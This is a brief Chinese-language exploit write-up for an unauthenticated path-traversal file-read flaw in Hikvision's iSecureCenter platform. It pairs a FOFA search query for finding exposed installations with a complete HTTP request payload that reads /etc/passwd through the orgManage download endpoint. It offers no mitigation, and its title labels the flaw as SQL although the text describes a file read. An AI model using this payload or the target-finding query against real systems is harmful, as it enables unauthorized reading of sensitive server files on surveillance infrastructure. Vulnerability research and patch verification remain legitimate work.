H14-9海康威视-iSecureCenter综合安防管理平台-SQL

漏洞描述：

海康威视综合安防管理平台 orgManage/v1/orgs/download 接口处存在任意文件读取漏洞，未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件，造成信息泄露，使系统处于极不安全的状态。

网站图片：

fofa语法：

title=“综合安防管理平台”

漏洞复现：

payload：

GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=./././/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

效果图：